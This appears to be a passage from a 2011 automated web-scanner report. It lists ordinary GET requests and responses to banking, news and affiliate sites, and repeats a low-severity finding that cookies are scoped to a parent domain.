HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 01:15:49 GMT Server: Apache X-Powered-By: PHP/5.2.4-2ubuntu5.12 Set-Cookie: PHPSESSID=394bce86b159c0f351253ee87caa8df9; path=/ Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: exp_last_visit=981364550; expires=Fri, 03-Feb-2012 01:15:50 GMT; path=/; domain=.grist.org Set-Cookie: exp_last_activity=1296724550; expires=Fri, 03-Feb-2012 01:15:50 GMT; path=/; domain=.grist.org Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A82%3A%22%2Farticle%2Ffood-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren%2F%22%3B%7D; path=/; domain=.grist.org Last-Modified: Thu, 03 Feb 2011 01:15:50 GMT Content-Type: text/html X-Cache: MISS from grist-squid02.prod.grist.org X-Cache-Lookup: MISS from grist-squid02.prod.grist.org:80 Via: 1.0 grist-squid02.prod.grist.org (squid/3.1.8) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceb ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /business/2011/jan/11/offshore-oil-industry-white-house HTTP/1.1 Host: www.guardian.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:15:50 GMT Server: Apache X-GU-jas: 07-16121 X-GU-PageRenderer: DefaultPageRenderer Content-Language: en Content-Type: text/html; charset=UTF-8 Set-Cookie: GU_MU=VFVvQnhRcjZERHdBQUNoYlFSUUFBQUJafEkxMytueWM9; path=/; domain=.guardian.co.uk; expires=Sun, 31-Jan-2021 01:15:49 GMT Set-Cookie: GU_LOCATION=dXNhOjU6dHg6NDpkYWxsYXM6Mzo2MjM6YnJvYWRiYW5kOiAzMi43ODc6LTk2Ljc5OUA0NzI1NDI3MTgzMTgzMjE1MjMzMTk3MTM1OTcyNjIyMTAxNzUyOQ==; path=/; domain=.guardian.co.uk; expires=Thu, 24-Feb-2011 01:15:49 GMT Vary: Accept-Encoding,User-Agent X-GU-httpd: 03 P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC" Connection: close Content-Length: 98316
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" l ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.ibsnetaccess.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<HTML> <HEAD> <TITLE>FIA Card Services Net Access</TITLE> <META NAME = "Keywords" CONTENT = "FIA Card Services, FIA card services, net access, FIA Card Services Net Access, FIA card services ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/pages/self-directed-investing.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/pages/zero-dollar-trades.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/pages/home.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m/pages/merrill-edge-advisory-center.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /my/charteroneinvest HTTP/1.1 Host: www.mystreetscape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: FWS/7.0 Date: Wed, 02 Feb 2011 22:19:32 GMT P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi" Set-cookie: MC=ICnV^lPuGcmwLOC9l5HCSfEXjIkSAk1J2HQKA0w6IAAOywABqjMGBAAAAQAGBU1J2HQAP03; path=/; domain=.mystreetscape.com; expires=Thu, 02-Feb-2012 22:19:32 GMT Set-cookie: spc=311; path=/ Cache-control: public Set-cookie: HttpOnly Set-cookie: JSESSIONID=48E9C3976D90BB921D5C93D8E938BE52; path=/; secure Content-length: 264 Content-type: text/html Fsreqid: REQ4d49d8740a034c3a20000ecb0000aa33 Fscalleeid: ibweb311 Fselapsedtime: 9719 Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /my/citizensinvest HTTP/1.1 Host: www.mystreetscape.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: FWS/7.0 Date: Wed, 02 Feb 2011 22:19:32 GMT P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi" Set-cookie: MC=^dlv6nLB_DEtlMTGowZrrNRWb_gSAk1J2HQKA0w6IAAO3QABqjMGBAAAAQAGBU1J2HQAP03; path=/; domain=.mystreetscape.com; expires=Thu, 02-Feb-2012 22:19:32 GMT Set-cookie: spc=321; path=/ Cache-control: public Set-cookie: HttpOnly Set-cookie: JSESSIONID=7117D3482F67F60B23716F580E8C6714; path=/; secure Content-length: 259 Content-type: text/html Fsreqid: REQ4d49d8740a034c3a20000edd0000aa33 Fscalleeid: ibweb321 Fselapsedtime: 9769 Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /alservlet/ForgotUserIdServlet HTTP/1.1 Host: www.onlinebanking.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /alservlet/OnlineBankingServlet HTTP/1.1 Host: www.onlinebanking.pnc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> <html> <head> <title>PNC Bank Online Banking</title> <meta http-equiv="Expires" content=" ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /IRA/pages/home.aspx HTTP/1.1 Host: www.retirement.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /TotalMerrill/pages/home.aspx HTTP/1.1 Host: www.totalmerrill.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.viglink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=UTF-8 Date: Wed, 02 Feb 2011 23:45:27 GMT Expires: -1 Pragma: no-cache Set-Cookie: vglnk.Agent.p=38d8b11a817b037b4b6a4f8ea1982e0a; Domain=.viglink.com; Expires=Sat, 30-Jan-2021 23:45:27 GMT; Path=/ Set-Cookie: JSESSIONID=850E1DB3E66B214055AFE3AAEB898474; Path=/ Vary: Accept-Encoding Connection: Close Content-Length: 14626
<!doctype html> <html lang="en" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <title>Affiliate Every Link on the Web with VigLink</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.wachovia.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="https://www.wachovia.co ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/26551757/detail.html HTTP/1.1 Host: www.wcti12.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html class="no-js"> <head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1 ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
v1st=EF949CC12A6233AB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.wellsfargo.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:00:54 GMT Content-length: 0 Content-type: text/html Set-Cookie: v1st=EF949CC12A6233AB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com Location: https://www.wellsfargo.com/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.wellsfargo.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=EF949CC12A6233AB
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about/diversity/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:27 GMT Content-length: 8581 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=FY7dNJhH8RGtvgN8pvr6lX4lzZGNk421hDYK0F55Yk6vq3xThh62!-1136720127; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>About Wells Fargo - Diversity ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /autoloans/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:48 GMT Content-length: 11460 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=KwsQNJhcppJbXh2HGTsl1xSTLrXLWgsZLDGy5r0NvKM6nG1NGQ1j!349572437; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /autoloans/apply HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 301 Moved Permanently Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:49 GMT Content-length: 15 Content-type: text/html; charset=ISO-8859-1 X-Cnection: close Location: https://financial.wellsfargo.com/autoapp/tostep1.do?promocode=WLAA11040010 Set-Cookie: wcmcookiewf=Fv9vNJhdHXqhTvtpGZyxXhXVBryX2GtWB5ZTb3zZv6w3Q0v3XypL!1507309987; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2046057226.16927.0000; path=/ Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browser/jaws_setting HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:19 GMT Content-length: 3286 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=gCGwNJhfWxmh2NDPMGhQzzBB1njKkFyRGKJNnjbmVQ2rzhccQTt5!-1657447489; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2348047114.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /careers/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:30:00 GMT Content-length: 7617 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=sG2NNJhL8zpPgGJdS0NpchvpTRWLPJr0HLnS3ss5SYWfnJWcs2V7!1746616152; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2146720522.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:36 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=Q3cLNJhQSJXJ01dhNTVGyQlHhTNfcGvp2PwmMkwzDRSyBnTQJh5n!1192939746; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2515819274.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /com/comintro HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:25 GMT Location: https://www.wellsfargo.com/com/ Set-Cookie: wcmcookiewf=hdNDNJhFB2Vy1gQG4jHHJMtydYJQ6bLJT7Jc3x03KXZTLVhH4VKx!312685559; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2264161034.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/com/">h ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /credit_cards/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:38 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=lcphNJhSDNXQXcnvvp6Pqwv3mHjKLNpN7rmll0htLDpp25KdLbp1!-88744709; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2532596490.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /credit_cards/select_card HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:38 GMT Location: https://www.wellsfargo.com/credit_cards/ Set-Cookie: wcmcookiewf=cnHtNJhSv05Mv5yd9N4HJR2wQH8TNThgFHky9sygWXwY8CTHxjHQ!-1273606700; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1777621770.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/credit_ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /equity/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /equity/rate_payments/information/rate_calc HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:44 GMT Location: https://www.wellsfargo.com/equity/tools/rate_calc Set-Cookie: wcmcookiewf=LG9sNJhYpZTn2Dhm7pS2x0hcpW0hNsZJG2QzvpSYMRFWGZJ5tRlh!-705334509; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2163497738.16927.0000; path=/ Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/equity/ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /help/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:21 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=fTG5NJhBTvhh8THS9LpgByvt7m89Gy4r1dsVhd3yzr8nQnnF6vzk!349572437; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Customer Service f ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /help/faqs/signon_faqs HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:22 GMT Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=vXXtNJhCXy5g11qrwqXKMTLPF3dHrhGLJvg8Wj9MRTTBXJmf9lQT!-1136720127; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /help/services HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:29:23 GMT Content-length: 11416 Content-type: text/html; charset=UTF-8 Set-Cookie: wcmcookiewf=TYQnNJhDw4QJgQtW7VVtnt2LBv3VJm8hq3Dj4zygqfRB09vyWKnn!191917939; domain=.wellsfargo.com; path=/; secure Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Customer Service - ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /insurance/ HTTP/1.1 Host: www.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
